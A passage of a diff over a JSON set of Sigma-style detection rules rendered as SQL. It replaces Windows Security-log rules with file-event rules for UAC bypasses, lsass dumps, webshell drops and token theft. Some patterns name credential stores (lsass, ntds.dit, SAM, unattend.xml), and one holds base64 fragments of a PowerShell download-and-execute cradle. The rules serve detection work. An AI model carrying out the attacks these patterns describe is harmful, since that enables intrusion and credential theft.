'\\' OR NewProcessName LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1216" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "status": "test", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Unauthorized System Time Modification", - "id": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "title": "Advanced IP Scanner - File Event", + "id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "status": "test", - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "author": "@neu5ron", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + "Legitimate administrative use" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4616' AND NOT (((ProcessName LIKE 'C:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\VBoxService.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\msoobe.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND SubjectUserSid = 'S-1-5-19')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Advanced IP Scanner 2%' ESCAPE '\\'" ], - "filename": "win_security_susp_time_modification.yml" + "filename": "file_event_win_advanced_ip_scanner.yml" }, { - "title": "Processes Accessing the Microphone and Webcam", - "id": "8cd538a4-62d5-4e83-810b-12d41e428d6e", + "title": "Suspicious Unattend.xml File Access", + "id": "1a3d42dd-3763-46b9-8025-b5f17f340dfb", "status": "test", - "description": "Potential adversaries accessing the microphone and webcam in an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored.\nIf these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process\n", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4663') AND (ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\microphone\\\\NonPackaged%' ESCAPE '\\' OR ObjectName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\webcam\\\\NonPackaged%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\unattend.xml' ESCAPE '\\'" ], - "filename": "win_security_camera_microphone_access.yml" + "filename": "file_event_win_access_susp_unattend_xml.yml" }, { - "title": "Access to ADMIN$ Share", - "id": "098d7118-55bc-4912-a836-dc6483a8d150", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", "status": "test", - "description": "Detects access to $ADMIN share", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ - "Legitimate administrative activity" + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5140' AND ShareName = 'Admin$') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_admin_share_access.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Created Files by Microsoft Sync Center", + "id": "409f8a98-4496-4aaa-818a-c931c0a8b832", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "This rule detects suspicious files created by Microsoft Sync Center (mobsync)", + "author": "elhoim", "tags": [ + "attack.t1055", + "attack.t1218", "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_susp_creation_by_mobsync.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.t1548.002" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Transferring Files with Credential Data via Network Shares", - "id": "910ab938-668b-401b-b08c-b596e80fdca5", - "status": "test", - "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", + "status": "experimental", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.001", - "attack.t1003.003" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Transferring sensitive files for legitimate administration work by legitimate administrator" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%\\\\mimidrv%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\lsass%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\windows\\\\minidump\\\\%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\hiberfil%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sqldmpr%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\sam%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\ntds.dit%' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\security%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "Anydesk Temporary Artefact", + "id": "0b9ad457-2554-44c1-82c2-d56a99c42377", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", "attack.command_and_control", - "attack.t1071.004" + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\user.conf%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\AnyDesk\\\\system.conf%' ESCAPE '\\') AND TargetFilename LIKE '%.temp' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_anydesk_artefact.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "status": "test", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", + "status": "test", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Locked Workstation", - "id": "411742ad-89b0-49cb-a7b0-3971b5c1e0a4", - "status": "stable", - "description": "Automatically lock workstation sessions after a standard period of inactivity.\nThe case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4800')" + "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_workstation_was_locked.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "Invoke-Obfuscation RUNDLL LAUNCHER - Security", - "id": "f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca", + "title": "SCR File Write Event", + "id": "c048f047-7e2a-4888-b302-55f509d4a91d", "status": "experimental", - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an \".SCR\" file using \"rundll32.exe desk.cpl,InstallScreenSaver\" for example.", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "The installation of new screen savers by third party software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%rundll32.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%shell32.dll%' ESCAPE '\\' AND ServiceFileName LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.scr' ESCAPE '\\' AND NOT ((TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\NewOS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE ':\\\\WUDownloadCache\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_via_rundll_services_security.yml" + "filename": "file_event_win_new_src_file.yml" }, { - "title": "Group Modification Logging", - "id": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", - "status": "stable", - "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", - "author": "Alexandr Yampolskyi, SOC Prime", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", + "tags": [ + "attack.initial_access", + "attack.t1566.001" + ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4728', '4729', '4730', '633', '632', '634'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\'))" ], - "filename": "win_security_group_modification_logging.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "AD User Enumeration", - "id": "ab6bffca-beff-4baa-af11-6733f296d57a", - "status": "test", - "description": "Detects access to a domain user from a non-machine account", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious File Drop by Exchange", + "id": "6b269392-9eba-40b5-acb6-55c882b20ba6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.persistence", + "attack.t1190", + "attack.initial_access", + "attack.t1505.003" ], "falsepositives": [ - "Administrators configuring new users." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND ObjectType LIKE '%bf967aba-0de6-11d0-a285-00aa003049e2%' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" ], - "filename": "win_security_ad_user_enumeration.yml" + "filename": "file_event_win_exchange_webshell_drop_suspicious.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "Suspicious VHD Image Download From Browser", + "id": "8468111a-ef07-4654-903b-b863a80bbc95", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects creation of \".vhd\"/\".vhdx\" files by browser processes.\nMalware can use mountable Virtual Hard Disk \".vhd\" files to encapsulate payloads and evade security controls.\n", + "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ - "Unknown" + "Legitimate downloads of \".vhd\" files would also trigger this" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_mal_vhd_download.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ - "attack.discovery", - 